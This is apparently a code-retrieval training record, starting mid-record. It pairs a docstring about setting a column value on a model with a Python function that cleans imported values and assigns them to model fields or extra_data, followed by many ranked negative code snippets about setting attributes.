isinstance(attr_value, struct_time):\n attr_value = self.serialize_datetime(attr_value)\n\n setattr(self, key, attr_value)", "def _load_attrs(self) -> None:\n self.attr_ids.clear()\n for attr_label, attr_value in self.element.attr.items():\n self.add_attr(None, attr_label, attr_value)\n self._update_attr_list()", "def __setattr__(self, name, value):\n if not self.__dict__.has_key('_initialised'): # this test allows attributes to be set in the __init__ method\n return dict.__setattr__(self, name, value)\n elif name in self: # any normal attributes are handled normally\n dict.__setattr__(self, name, value)\n else:\n self.__setitem__(name, value)" ]
[ "0.79411536", "0.7760498", "0.74538267", "0.73853767", "0.7362866", "0.71887094", "0.7146371", "0.7146371", "0.7146371", "0.7098289", "0.70153654", "0.699478", "0.69330215", "0.68741333", "0.68410134", "0.6835195", "0.673314", "0.67293113", "0.66948265", "0.6694178", "0.66822034", "0.66728437", "0.6655597", "0.66395026", "0.6635546", "0.6632001", "0.6627901", "0.66025656", "0.65755033", "0.6516347", "0.6506727", "0.64954156", "0.64901596", "0.6488747", "0.6488747", "0.6488747", "0.6476487", "0.6475202", "0.646804", "0.64663374", "0.6460597", "0.6447797", "0.64392143", "0.6433127", "0.6422097", "0.64182806", "0.64045393", "0.63996905", "0.63785094", "0.6370708", "0.6369225", "0.6368802", "0.6361304", "0.63525283", "0.6338941", "0.63358533", "0.6332958", "0.6332958", "0.63086164", "0.62849367", "0.6275123", "0.62615484", "0.6251924", "0.6246777", "0.6246777", "0.62417144", "0.622231", "0.622231", "0.62183267", "0.6218167", "0.62095976", "0.62062335", "0.6202282", "0.61993617", "0.61922044", "0.618667", "0.6174047", "0.6167156", "0.61308205", "0.6112932", "0.6111885", "0.61048234", "0.60988504", "0.6095748", "0.6095748", "0.6090265", "0.6082952", "0.6071768", "0.60690147", "0.6058394", "0.60532767", "0.6049961", "0.6049184", "0.60272646", "0.6024787", "0.6019378", "0.6017795", "0.6010953", "0.60072666", "0.59935224" ]
0.6589023
28
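Many of the negative snippets in the record above are variations on a single idiom: copying a dict or **kwargs onto an instance with setattr. A minimal standalone sketch of that idiom, with invented class and field names (nothing here is taken verbatim from the dataset):

class Record:
    def __init__(self, **kwargs):
        # Copy every keyword argument onto the instance as an attribute.
        for key, value in kwargs.items():
            setattr(self, key, value)

r = Record(name="sensor-1", value=42)
print(r.name, r.value)  # -> sensor-1 42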
Concatenate the values into one string to set for target.
def _concat_values(concat_columns, column_values, delimiter): # Use the order of values that we got from concat_columns def. values = [ column_values[item] for item in concat_columns if item in column_values ] return delimiter.join(values) or None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def concat(values, sep=', '):\n concat_str = None\n try:\n concat_str = sep.join([str(v) for v in values if not is_empty(v)])\n except Exception as e:\n pass\n return concat_str", "def joined_parameter(*values: str) -> str:\n return \"+\".join(values)", "def _concat(self, *args, **kwargs):\n values = list(args)\n output = []\n for value in values:\n if not isinstance(value, (str, basestring)):\n value = unicode(value)\n else:\n value = unicode(value)\n value = value.strip()\n output.append(value)\n output = kwargs[\"delimiter\"].join(output)\n output = unicode(output)\n return output", "def join_path(values: t.List[str]) -> str:\n from axonius_api_client.tools import listify\n\n return \" => \".join(listify(values))", "def __str__(self):\n return f'[{\"\".join(str(val) + \", \" for val in self)[:-2]}]'", "def join(self, values):\n values = [self.unpack(v) for v in ensure_list(values)]\n return self.pack(values)", "def __str__(self):\n s = ''\n for v in self:\n s = ''.join([s, ',' if s else '', str(v)])\n return s", "def __str__(self):\n return \"{%s}\" % \", \".join(str(x) for x in self)", "def concatenate_data():", "def __str__(self):\n return \"%s(%s)\" % (self[0], \", \".join(map(str, self[1:])))", "def __str__(self):\n return \"{0} {1}\".format(self.operation, \", \".join([v for v in [self.operand0, self.operand1, self.operand2] if v is not None]))", "def __str__(self):\n return ''.join(self)", "def RSet(var, value):\n return \" \" * (len(var) - len(value)) + value[:len(var)]", "def combine_copy_options(copy_options):\n return \" \".join(copy_options)", "def implicit_cat(values):\n values = [value for value in values if value is not None]\n if len(values) == 0:\n return None\n if len(values) == 1:\n return values[0]\n return \"\".join(str(value) for value in values)", "def str(self) -> str:\n return \"\".join(self)", "def _str_targets(self):\n def _slice_to_str(obj):\n if isinstance(obj, slice):\n start = \"\" if obj.start is None else str(obj.start.__index__())\n stop = \"\" if obj.stop is None else str(obj.stop.__index__())\n if obj.step is None:\n return f\"{start}:{stop}\"\n else:\n step = str(obj.step.__index__())\n return f\"{start}:{stop}:{step}\"\n else:\n return obj.__index__()\n\n if isinstance(self.targets, tuple):\n return f\"[{', '.join(_slice_to_str(idx for idx in self.targets))}]\"\n else:\n return f\"[{_slice_to_str(self.targets)}]\"", "def concatena(*args):\n linea = ''\n for l in args:\n linea += str(l if l else '')\n return linea", "def concatenate_observation_data(\n self, compartment, date, measurementmethod, orig_srid, origx, origy,\n parameter, property, quality, sampledevice, samplemethod, unit, value,\n ):\n # Convert to string before joining\n data = map(str, [\n compartment, date, measurementmethod, orig_srid, origx, origy,\n parameter, property, quality, sampledevice, samplemethod, unit,\n value\n ])\n return ''.join(data)", "def join_with_and(values, last_word: str = 'and') -> str:\n valuesList = list(values)\n length = len(valuesList)\n\n # value1, value2, value3 and value4\n if length > 2:\n return '{} {} {}'.format(', '.join(valuesList[:-1]), last_word, valuesList[-1])\n # value1 and value2\n elif length == 2:\n return '{} {} {}'.format(valuesList[0], last_word, valuesList[1])\n # value 1\n elif length == 1:\n return valuesList[0]\n # Empty\n return ''", "def __str__(self):\n return ' '.join([self.source, self.name, str(self.outputs)])", "def __str__(self):\n \n return reduce(lambda a,b : str(a)+str(b),self.list)", "def format_inputs_outputs(self, 
values):\n return ', '.join('%s=%s' % (key, value)\n for key, value in sorted(values.iteritems()))", "def join_with_or(values) -> str:\n return join_with_and(values, 'or')", "def __str__(self):\n left = ''\n right = ''\n for i in range(len(self.ant)):\n left += Prop.__str__(self.ant[i]) + \", \"\n \n for i in range(len(self.con)):\n right += Prop.__str__(self.con[i]) + \", \"\n return left[:-2] + '|-- ' + right[:-2]", "def extend_result(val):\n if isinstance(val, list):\n return ','.join(val)\n return val", "def _build_summary(\n val1: str | None = None, val2: str | None = None, val3: str | None = None\n ) -> str:\n return ' : '.join([value for value in [val1, val2, val3] if value is not None])", "def _to_string(self):\r\n parts = []\r\n if self.offering:\r\n parts.extend([self.org, self.offering])\r\n if self.branch:\r\n parts.append(u\"{prefix}+{branch}\".format(prefix=self.BRANCH_PREFIX, branch=self.branch))\r\n if self.version_guid:\r\n parts.append(u\"{prefix}+{guid}\".format(prefix=self.VERSION_PREFIX, guid=self.version_guid))\r\n return u\"+\".join(parts)", "def _assemble(self):\n setexpr = ', '.join(\n f'{name} = %({name})s'\n for name in self._valueskw\n )\n froms = 'from ' + ', '.join(self._tables) if self._tables else ''\n kw = self._kw.copy()\n wheres, wkw = self._build_where()\n kw.update(wkw)\n kw.update(self._valueskw)\n return (\n f'update {self._table} '\n f'set {setexpr} '\n f'{froms} '\n f'{wheres}'\n ), kw", "def __str__(self):\n return ', '.join(str(item) for item in self._data)", "def join(self, iterable) -> String:\n pass", "def _get_const_str(self):\n const_components = []\n for k, v in self.constargs.items():\n v_str = f\"'{v}'\" if type(v) is str else str(v)\n const_components.append(f\"{k}={v_str}\")\n return \",\".join(const_components)", "def join_strings(self):\n\n self.__corpora = [' ' + ' '.join(strings) + ' ' for strings in self.__corpora]", "def concat_all(self):\n return self.merge(1)", "def valueToString():", "def compose(self):\r\n return_str = \"\\t\".join([\r\n self.seqid,\r\n self.source,\r\n self.type,\r\n str(self.start),\r\n str(self.end),\r\n self.score,\r\n self.strand,\r\n self.phase,\r\n self.attributes.compose()\r\n ])\r\n return return_str", "def array_to_concatenated_string(array):\r\n return \",\".join(str(x) for x in array)", "def f_val_to_str(self):\n\n resstrlist = []\n strlen = 0\n\n for key in self._data:\n val = self._data[key]\n resstr = \"%s=%s, \" % (key, repr(val))\n resstrlist.append(resstr)\n\n strlen += len(resstr)\n if strlen > pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH:\n break\n\n return_string = \"\".join(resstrlist)\n if len(return_string) > pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH:\n return_string = (\n return_string[0 : pypetconstants.HDF5_STRCOL_MAX_VALUE_LENGTH - 3]\n + \"...\"\n )\n else:\n return_string = return_string[0:-2] # Delete the last `, `\n\n return return_string", "def LSet(var, value):\n return value[:len(var)] + \" \" * (len(var) - len(value))", "def flatten(self):\n if len(self.children) == 0:\n return self.val\n params = (',').join([ child.flatten() for child in self.children ])\n return '%s(%s)' % (self.val, params)", "def __str__(self):\n termStrings = []\n for term in self.LHS:\n coefficient = term[0]\n unknownSet = term[1]\n\n termString = str(coefficient) + ' * '\n unknownStrings = []\n for unknown in unknownSet:\n unknownString = unknown[0].__class__.__name__ + '@' + str(id(unknown[0]))[-4:] + '.' + unknown[1] # last 4 digits of variable ID . 
attribute name\n unknownStrings.append(unknownString)\n termString += str.join(' * ', unknownStrings)\n termStrings.append(termString)\n\n termStrings = str.join(' + ', termStrings)\n return termStrings + ' = ' + str(self.RHS)", "def concatenate_items(items, conjunction='and'):\n text = ''\n if not items:\n text = ''\n elif len(items) == 1:\n text = items[0]\n elif len(items) == 2:\n text = '{} {} {}'.format(items[0], conjunction, items[1])\n else:\n text = ', '.join(items[:-1])\n text += ', {} {}'.format(conjunction, items[-1])\n return text", "def __str__(self):\n ingredient_names = [str(ingredient) for ingredient in self.ingredients]\n return ', '.join(ingredient_names)", "def refreshAttrStr(self):\n self.attributes_str = ';'.join(['='.join(\n [attr, self.attributes[attr]]) for attr in self.attributes_order])", "def __str__(self):\n res = \"<\"\n for elem in self.values[:-1]:\n res += str(elem) + \", \"\n res += str(self.values[-1]) + \">\"\n return res", "def __str__(self):\n self.vals.sort()\n result = ''\n for e in self.vals:\n result = result + str(e) + ','\n return '{' + result[:-1] + '}'", "def concat_address_full(**kwargs):\r\n result = \"{concat_address} {city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n if kwargs[\"four_digit_zip_code\"]:\r\n result += \"-{four_digit_zip_code}\".format(**kwargs)\r\n return result", "def array_to_concatenated_string(array):\n return \",\".join(str(x) for x in array)", "def str_cat(arg1, arg2):\n return str(arg1) + str(arg2)", "def __str__ (self):\n return \", \".join(str(row) for row in self.rows()).join(\"()\")", "def join_vars(self, xs):\n return tf.concat(1, xs)", "def get_string(self):\n return (self.loop_level+1) * ' ' + ','.join(map(str, self.get_list()))", "def as_str(the_val):\n if hasattr(the_val, \"__iter__\"):\n return \"[{}]\".format(\", \".join([str(v) for v in the_val]))\n return str(the_val)", "def __str__(self):\n return ' '.join([str(item) for item in self])", "def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result", "def stringify(self, value):\n if isinstance(value, list):\n return \", \".join(value)\n else:\n return str(value)", "def generate_sql_update_set_formatted_string(keys_list: List[str]):\n\n return \", \".join([f\"{key} = :{key}\" for key in keys_list])", "def __str__(self):\n return str(self._name + \", \" + self._value)", "def my_join(iters, string):\n out = \"\"\n for i in range(iters):\n out += \",\" + string \n return out", "def concatenate_columns(params: List[str]) -> str:\n convert_columns_to_string = [f'string({col})' for col in params]\n\n return f\"concat({','.join(convert_columns_to_string)})\"", "def __str__(self):\n self.vals.sort()\n return '{' + ','.join([str(e) for e in self.vals]) + '}'", "def _convertListToString(self, list_of_objects):\n return (';').join(list_of_objects)", "def __str__(self):\n if self.is_empty():\n return \"\"\n return \" \".join(list(iter(self)))", "def __str__(self):\n output = []\n output.append(str(self.x))\n output.append(str(self.p))\n return \" \".join(output)", "def value_to_output(value, output):\n if value != \"\":\n output.append(value)\n return \"\"", "def join(self, tokens):\n if self.chars:\n joiner = ''\n else:\n joiner = ' '\n return joiner.join(tokens)", 
"def concatenate(row, fields):\n print row\n str = None\n for field in fields:\n if str == None:\n str = row[field]\n else:\n str += ' ' + row[field]\n return str", "def join_typeval(self, type_, val):\n return self.splitter.join((type_, val))", "def __str__(self):\r\n self.vals.sort()\r\n return '{' + ','.join([str(e) for e in self.vals]) + '}'", "def __unicode__(self):\n\t\tresult = unicode(self.input_path) +', '+ unicode(self.output_path)\n\t\treturn result", "def word_join(self, words):\n return \" \".join(words)", "def to_string(self):\n filter_string = '('\n variable_length = len(self.values) - 1\n for index in range(0, variable_length + 1):\n filter_string += '&' + self.values[index]\n # append or for all but the last\n if index < variable_length:\n filter_string += self.combination_operator\n filter_string += ')'\n\n return filter_string", "def concatenate_string(stringy1, stringy2):\n\n return \"{} {}\".format(stringy1, stringy2)", "def _concatenate_instance(\n self,\n emotion: str,\n target_utterance: str,\n evidence_utterance: str,\n conversation_history: str,\n ) -> str:\n concatenated_text = (\n \" \"\n + emotion\n + \" <SEP> \"\n + target_utterance\n + \" <SEP> \"\n + evidence_utterance\n + \" <SEP> \"\n + conversation_history\n )\n\n return concatenated_text", "def combine(self):\n # If the contents of this command should be hidden from the main .cfg,\n # discard them.\n if self.hide_children:\n return \"\"\n\n # Set the evaluation state of this instance to COMBINE, as its code has\n # been generated.\n self.eval_state = COMMAND_EVAL_COMBINE\n\n # output will store the contents of this instance; meaning its code and\n # the code of its children.\n output = []\n\n # Loop through children and evaluate them.\n for ch in self.children:\n # Only evaluate children if they haven't been yet (i.e., their eval\n # state is not COMMAND_EVAL_COMBINE)\n if ch.eval_state == COMMAND_EVAL_REGISTER:\n gen = ch.generate()\n if gen is not None:\n output.append('alias \"'+str(ch)+'\" \"'+gen+'\"')\n output.extend(ch.combine())\n\n return output", "def __str__(self):\n string = \"\"\n for i in self.tour_ids:\n string = string + str(i) + \" -> \"\n string += str(self.tour_ids[0])\n return string", "def __str__(self):\n return str(self._key) + \", \" + str(self._value[0]) + \", \" + str(self._value[1])", "def my_join(iters, string):\n out=''\n for i in range(iters):\n out += string.join(\", \")\n #add string together with , as seperator\n #repeat iters numbers of times\n return out", "def testRegisterConcatenation(self):\n reg_one = ShiftRegister(2)\n reg_one.shift(\"a\")\n reg_one.shift(\"b\")\n reg_two = ShiftRegister(3)\n reg_two.shift(\"c\")\n reg_two.shift(\"d\")\n reg_two.shift(\"e\")\n reg_cat = reg_one.concatenate(reg_two)\n self.assertEqual(''.join(reg_cat), \"abcde\")", "def __str__(self):\n output = \"\"\n for i in self.values:\n st = []\n output += \"[\"\n for j in i:\n st.append(str(j))\n output += \",\".join(st)+\"]\"\n return str(self.m)+\"x\"+str(self.n)+\" [\" + output + \"]\"", "def concatenate_processed_text(self):\n\n\n\t\tconcatenated_text = \"\"\n\t\tfor line in self.processed_text:\n\t\t\tconcatenated_text += \" \".join(line) + \" \"\n\n\n\t\t# Remove the trailing space character from the concatenated string\n\t\t# of words.\n\t\tconcatenated_text = concatenated_text[:-1]\n\n\t\tself.concatenated_text = concatenated_text", "def rejoin(textList):\n return ','.join(textList)", "def __str__(self):\n values = \"\"\n node = self.head\n while node:\n values = values + \"{} 
\".format(node.__str__())\n node = node.next\n return values", "def Join(sourcearray, delimeter=\" \"):\n s_list = list(map(str, sourcearray))\n return delimeter.join(s_list)", "def concat_strings(l_strings):\n if l_strings == []:\n return \"\"\n else: \n return l_strings[0] + \" \" + concat_strings(l_strings[1:])", "def as_str(self):\n connectivity_str = '_'.join(map(str, self.values))\n return connectivity_str", "def irchain_str(self):\n s = []\n if self.irlen_before:\n s.append('%d' % self.irlen_before)\n s.append('(%d)' % self.irlen)\n if self.irlen_after:\n s.append('%d' % self.irlen_after)\n return ','.join(s)", "def __str__(self):\n assert not hasattr(self, \"value\")\n if self.is_set:\n return \"%s \" % self.names[0]\n else:\n return \"\"", "def full_str(self):\n outstr = self._field1 + \": \"\n outstr = outstr + str(self._field2)\n return outstr", "def __str__(self):\n return ' '.join([self.chromosome, self.strand, self.full_position])", "def concatenate_string(string1, stringy2):\n return string1 + \" \" + stringy2", "def __str__(self):\r\n\t\tstrRepr = ''\r\n\t\tfor i, person in enumerate(self.people):\r\n\t\t\tassignmentsString = ','.join((self.assignments[i,:].astype(int)).astype(str))\r\n\t\t\tstrRepr += '{0},{1}\\n'.format(person.uid, assignmentsString)\r\n\t\treturn strRepr", "def __str__(self):\n s = ''\n for node in self.nodes:\n s += '\\n\\n'+str(node)+'\\n\\t'\n edges = node.getChildren()\n keys = edges.keys()\n keys.sort()\n for key in keys:\n bounds = edges[key].getSuffix()\n s += str(edges[key])+' '\n for i in xrange(bounds[0], bounds[1]):\n s += self.target[i]\n s += '\\n\\t'\n return s", "def __str__(self):\t\t\n\t\tcadena = []\n\t\tactual = self.prim\t\t\n\t\twhile actual:\n\t\t\tif type(actual.dato) == str:\n\t\t\t\tcadena.append(\"'\" + str(actual.dato) + \"'\")\n\t\t\telse:\t\n\t\t\t\tcadena.append(str(actual.dato))\n\t\t\tactual = actual.prox\n\t\treturn \"[\" + \", \".join(cadena) + \"]\"", "def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out", "def join(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append(''.join([k, '=', v]))\n print ', '.join(sub_items)", "def __str__(self):\n return 'Target with value ' + str(self.attributes[AT.VALUE])", "def __str__(self):\n s = 'word chain: ' + '\\n'\n for word in self._used_words[:-1]:\n s += word + ' -> '\n s += self._used_words[-1] + '\\ntarget word: ' + self._target\n return s", "def concat_text(text):\n textout = \" \".join(text)\n return textout", "def _toStr(toList):\n\n names = [formataddr(i) for i in zip(*toList)]\n return ', '.join(names)" ]
[ "0.66425836", "0.64691097", "0.63475597", "0.6099031", "0.60475785", "0.60406435", "0.604041", "0.60189885", "0.6017926", "0.5998727", "0.5937355", "0.5918181", "0.5915184", "0.5901235", "0.5898622", "0.58785903", "0.5799823", "0.5796432", "0.5734698", "0.5730965", "0.5715827", "0.5704806", "0.56980455", "0.5658565", "0.56432956", "0.5640445", "0.56382054", "0.5609051", "0.5607827", "0.5597937", "0.55867726", "0.5580681", "0.5576363", "0.5575408", "0.5575157", "0.5574907", "0.5574505", "0.55392385", "0.55301577", "0.5529245", "0.55238545", "0.5516037", "0.5513661", "0.55084425", "0.55067366", "0.5499419", "0.5481192", "0.5472112", "0.5463274", "0.5462388", "0.54557735", "0.54438215", "0.5442796", "0.5440702", "0.54328763", "0.54143417", "0.54139704", "0.5407667", "0.5394633", "0.53843665", "0.5383876", "0.5379409", "0.5379066", "0.53783274", "0.53749716", "0.5371934", "0.5370813", "0.534244", "0.5340177", "0.53383905", "0.5334602", "0.5325343", "0.5324787", "0.5316288", "0.530826", "0.5306069", "0.53038937", "0.5300695", "0.5294775", "0.5292959", "0.52911043", "0.5288605", "0.5288592", "0.5285204", "0.527543", "0.5269405", "0.5266008", "0.5260926", "0.52607834", "0.52495176", "0.5249019", "0.524729", "0.52444786", "0.52417827", "0.5241666", "0.52411336", "0.52296025", "0.52248687", "0.5223323", "0.52148527" ]
0.54848677
46
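A quick usage sketch of the _concat_values helper shown in the record above; the helper is restated so the example runs standalone, and the column names and row values are made up for illustration.

def _concat_values(concat_columns, column_values, delimiter):
    # Keep only the requested columns, in the order given by concat_columns.
    values = [column_values[item] for item in concat_columns if item in column_values]
    return delimiter.join(values) or None

row = {"address_line_1": "100 Main St", "city": "Springfield", "state": "IL"}
print(_concat_values(["address_line_1", "city", "state"], row, ", "))  # -> 100 Main St, Springfield, IL
print(_concat_values(["missing_column"], row, ", "))                   # -> None (empty join falls back to None)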
Set the column value as the target attr on our model.
def apply_column_value(raw_column_name, column_value, model, mapping, is_extra_data, cleaner): # If the item is the extra_data column, then make sure to save it to the # extra_data field of the database if raw_column_name in mapping: table_name, mapped_column_name, display_name, is_extra_data = mapping.get(raw_column_name) # special postal case: if mapped_column_name in ['postal_code', 'owner_postal_code']: if '-' in str(column_value): postal = str(column_value).split('-')[0].zfill(5) ext = str(column_value).split('-')[1].zfill(4) column_value = postal + '-' + ext column_value = str(column_value).zfill(5) cleaned_value = None if cleaner: # Get the list of Quantity fields from the Column object in SEED. This is non-ideal, since the # rest of the mapping code does not use SEED models. Perhaps make this an argument. if (model.__class__.__name__, mapped_column_name) in apps.get_model('seed', 'Column').QUANTITY_UNIT_COLUMNS: # clean against the database type first cleaned_value = cleaner.clean_value(column_value, mapped_column_name, is_extra_data) # This is a temporary fix for when the raw_column_name and the mapped_column_name # are the same. It causes the units to be cast twice since the cleaner look up finds # the same column twice. The cleaner needs to be cleaned up quite a bit to handle # this error correctly. if mapped_column_name != raw_column_name: # now clean against the raw name with pint (Quantity Units) because that's the column # that holds the units needed to interpret the value correctly cleaned_value = cleaner.clean_value(cleaned_value, raw_column_name, is_extra_data) else: cleaned_value = cleaner.clean_value(column_value, mapped_column_name, is_extra_data) else: cleaned_value = default_cleaner(column_value) if is_extra_data: if hasattr(model, 'extra_data'): # only save it if the model and the mapping are the same if model.__class__.__name__ == table_name: if isinstance(cleaned_value, (datetime, date)): # TODO: create an encoder for datetime once we are in Django 1.11 model.extra_data[mapped_column_name] = cleaned_value.isoformat() else: model.extra_data[mapped_column_name] = cleaned_value else: # Simply set the field to the cleaned value if it is the correct model if model.__class__.__name__ == table_name: setattr(model, mapped_column_name, cleaned_value) return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_attribute(self, name, value):\n attrs = self._column.attrs\n attrs[name] = value\n self._column.attrs = attrs", "def __set__(self, instance, value):\r\n if instance:\r\n return instance._values[self.column.column_name].setval(value)\r\n else:\r\n raise AttributeError('cannot reassign column values')", "def target(self, value):\n self._target = value", "def set_attribute(self, name, value):\n\n pass", "def set_attribute(self, attr, value):\n logger.debug(\"SET ATTRIBUTE {} to {}\".format(attr, value))", "def set_attribute(self, attr, value):\n super().set_attribute(attr, value) # Keep this line, it triggers the parent class method.\n setattr(self, attr, value)", "def _set_action_attribute(self, action, index, setdataarg):\n if isinstance(setdataarg.column, int):\n column = setdataarg.column\n else:\n column = getattr(self, setdataarg.column)\n data = self.get_data(index, setdataarg.role, column)\n if data is None:\n return\n setattrmethod = getattr(action, setdataarg.setfunc)\n if setdataarg.convertfunc:\n data = setdataarg.convertfunc(data)\n setattrmethod(data)", "def set_attribute(self, name, value):\n setattr(self, '%s__' % name, value_or_none(value))", "def set_attr(self, name, value):\n setattr(self, name, value)", "def set_value ( self, object, row, value ):\n column = self.get_data_column( object )\n column[ row ] = type( column[ row ] )( value )", "def target(self, target):\n self.__target = float(target)", "def set_value ( self, object, value ):\n target, name = self.target_name( object )\n setattr( target, name, value )", "def __setattr__(self, attr, value):\n field = getattr(self, attr)\n if isinstance(field, BaseType):\n # Check the value type\n check = field.accept_value(value)\n \n old_value = getattr(self, attr)\n object.__setattr__(self, attr, value)\n if isinstance(old_value, BaseType):\n # Not set yet\n old_value = None\n \n if Model.data_connector and Model.data_connector.running:\n with Model.data_connector.u_lock:\n Model.data_connector.update_object(self, attr, old_value)", "def _setAttr(self, attrName, value):\n\n if (value not in (None, \"\")):\n setattr(self, attrName, value)", "def _set_attribute(\n self, param_name, attr_name, value, matrix_shape, time_steps=None\n ):\n _validate_param_shape(\n param_name=param_name,\n matrix_shape=matrix_shape,\n actual_shape=value.shape,\n time_steps=time_steps,\n )\n setattr(self, attr_name, value)", "def write(self, value):\n self.get_attr().SetValue(value)", "def setCol(self, col):\n self.column = col", "def __setattr__ (self, attr, val):\n try:\n attrib = object.__getattribute__(self, attr)\n except AttributeError:\n object.__setattr__ (self, attr, val)\n return\n\n if not isinstance (attrib, RField):\n object.__setattr__ (self, attr, val)\n return\n\n if isinstance (attrib, ForeignKey):\n self.keyvals[attr] = val.id\n self.keyvals['__relationfor__'] = attrib.relation\n else:\n self.keyvals[attr] = val", "def set_attr(self, asset_key, attr, value=True):\r\n self.set_attrs(asset_key, {attr: value})", "def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:\n raise NotImplementedError()", "def __setattr__(self, attr, v):\n s = cleanup_name(attr)\n try:\n self[self[\"__psvcolumnstracker__\"][attr]] = v\n except KeyError:\n if attr in self.__sawhitelist__:\n super(Row, self).__setattr__(attr, v)\n else:\n keys = self[\"__psvcolumnstracker__\"].keys() \n if s in keys:\n raise AttributeError((\n \"{}{}\"\n .format(\n '\\'{}\\' has no attribute \\'{}\\''.format(\n type(self), attr),\n \". 
However, '{s}' is an existing condensed \".format(s=s) +\n \"column name. Only the condensed version is supported.\"\n .format(s=s)\n )))\n else:\n # A somewhat hacky implementation of Dict's restriction of editing it's\n # Attributes.\n if attr in dir(self):\n raise AttributeError(\n msg.attribute_readonly.format(classname=self.__class__, attr=attr))\n else:\n raise AttributeError(msg.attribute_missing.format(\n type(self), attr))", "def set(self, attr, val):\r\n self.__dict__[attr] = val", "def set_attr(self, attr_name, value, indices=None):\n target_remotes = self._get_target_remotes(indices)\n for remote in target_remotes:\n remote.send(('set_attr', (attr_name, value)))\n for remote in target_remotes:\n remote.recv()", "def apply_to_table(self, table: Table):\n table.change_column(self.column)", "def __setattr__ (self, attr, value):\n self.set_value (attr, value)", "def __set__(self, instance, val):\n raise AttributeError(\"Can't set attribute\")", "def set_value(self, row, colName, value):\n\t\tself[row][self._columns[colName]] = value", "def __setattr__(self, attr, value):\n super().__setattr__(attr, value)", "def corner_case_setattr(target, attr, value):\n if isinstance(target, collections.abc.Sequence):\n target[int(attr)] = value\n elif isinstance(target, collections.abc.Mapping):\n target[attr] = value\n else:\n setattr(target, attr, value)", "def setColumn(self,item,column,value):\n raise UncodedError", "def before_update(mapper, conn, target):\n if isinstance(target, Column):\n raise TypeError('Got a column instead of a table')\n\n if target.id_ is None:\n dataset_id = ObjectNumber.parse(target.d_id)\n target.id_ = str(TableNumber(dataset_id, target.sequence_id))", "def set_attribute(self, name, value, observed, author, author_nickname,\n author_affiliation, comment):\n setattr(self, '%s__' % name, value_or_none(value))\n setattr(self, '%s__observed' % name, value_or_none(observed))\n setattr(self, '%s__author' % name, value_or_none(author))\n setattr(self, '%s__author_nickname' % name,\n value_or_none(author_nickname))\n setattr(self, '%s__author_affiliation' % name,\n value_or_none(author_affiliation))\n setattr(self, '%s__comment' % name, value_or_none(comment))", "def Y_target(self, value):\n self._Y_target = value", "def set(self, attrname, value):\n setattr(self, attrname, value)\n self.dirty = True", "def set(self, properties):\n self._column.attrs = properties", "def set(self, attribute, value):\n self.__setattr__(attribute, value)", "def column(self, column):\n\n self._column = column", "def setattr(self, node, attr, value):\n node.set(attr, value)", "def setcolumn(self, column, value, accept_small_names=True):\n if column in self.keys():\n self[column] = value\n return\n elif accept_small_names:\n if self[\"__psvcolumnstracker__\"].get(column):\n self.__setattr__(column, value)\n return\n if not accept_small_names:\n raise ValueError(\"'{}'\".format(column))\n else:\n raise ValueError(\"'{}'. 
Make sure the shorterned columns name have no collisions\".format(column))", "def propagate_attribute(self, attr, val):\n self.activities.propagate_attribute(attr, val)", "def _set_model_field(self):\n self._field_value = hutils.format_json(self._memory_data)\n setattr(self._model, self._field, self._field_value)", "def set_attribute(self, path, name, value):\n if self.options['storage_method'] == 'hdf5':\n # execute h5py command\n self.file_pointer[path].attrs[name] = value\n elif self.options['storage_method'] == 'none':\n # save command for later processing\n self.h5commands.append((\"set_attribute\", path, name, value))\n else:\n raise Exception('Invalid option value for storage_method (%s)' % storage_method)", "def __setattr__(self, name, value):\n if name == 'source' or name == 'destination':\n # produce \"canonical\" form of a source / destination\n # FIXME: we need to handle arbitrary netmasks here\n if value is not None and value.endswith('/32'):\n value = value[:-3]\n elif name == 'goto' or name == 'jump':\n if value is not None and not isinstance(value, Target):\n value = Target(value)\n elif name == 'matches':\n if not isinstance(value, list):\n raise Exception(\"matches attribute requires a list\")\n self.__dict__[name] = value", "def setAttributeValue(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def setter(self, value):\n if field.readonly:\n raise fields.ValidationError(f\"'{name}' is a read only attribute\")\n\n # accept if this is a raw value too\n value = field.from_raw(value)\n\n # validate\n field.validate(value)\n\n # set current instance as parent for embedded objects/instances\n if isinstance(field, fields.Object):\n value.parent = self\n\n # se attribute\n setattr(self, inner_name, value)\n self._attr_updated(name, value)", "def __setattr__(self, attr, value):\n self[attr] = value", "def set_attr(self, session, k, v, **kwargs):\n if getattr(self, 'set_' + k, None):\n # setter method exists\n getattr(self, 'set_' + k)(session, v, **kwargs)\n else:\n setattr(self, k, v)", "def SetAttribute(self, attr, val):\n attrs = self.GetAttributes()\n attrs[attr] = val\n return self.SetAttributes(attr, attrs)", "def set(self, attribute: str, value: Any):\n return setattr(self, attribute, value)", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def __setattr__(self, name, value):\n self.set(**{name: value})", "def target(self, target):\n\n self._target = target", "def set_attr_values(self):\n ats = self.attributes # convenient short name\n for aid in ats:\n value = ats[aid]['nv'] if 'nv' in ats[aid] else (\n ats[aid]['value'] if 'value' in ats[aid] else None)\n if value is not None:\n# self.h5node.attrs[aid] = value\n #- self.file.file_pointer[self.full_path].attrs[aid] = value\n self.file.set_attribute(self.full_path, aid, value)\n #- self.file.h5save_attribute(self.full_path, aid, value)\n 